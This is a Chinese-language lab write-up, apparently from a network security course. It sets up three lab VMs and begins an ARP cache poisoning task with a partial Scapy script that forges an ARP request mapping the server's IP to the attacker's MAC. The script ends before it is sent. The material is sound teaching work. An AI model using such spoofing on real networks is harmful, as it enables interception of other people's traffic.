目录
Task 2: MITM Attack on Telnet using ARP Cache Poisoning
一、实验环境
本地共有三台虚拟机,位于同一个子网下。地址如下:
主机名 | IP 地址 | MAC 地址 |
M (攻击者) | 10.9.0.105 | 02:42:0a:09:00:69 |
A (客户端) | 10.9.0.5 | 02:42:0a:09:00:05 |
B (服务器) | 10.9.0.6 | 02:42:0a:09:00:06 |
二、实验内容
Task 1: ARP Cache Poisoning
•
Task 1A (using ARP request).
On host M, construct an ARP request packet and send to host A. Check whether M’s MAC address is mapped to B’s IP address in A’s ARP cache.
在主机 M 上,构造一个 ARP 请求包,发送给主机 A。查看主机 A 的 ARP 缓存中 M 的 MAC 地址是否映射到 B 的 IP 地址。
#!/usr/bin/python3
from scapy.all import *
# M
src_mac='02:42:0a:09:00:69'# M
dst_mac='00:00:00:00:00:00'
dst_mac_eth='ff:ff:ff:ff:ff:ff'
src_ip='10.9.0.6' # B
dst_ip='10.9.0.99' # 任意 IP
eth = Ether(src=src_mac,dst=dst_mac_eth)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=1)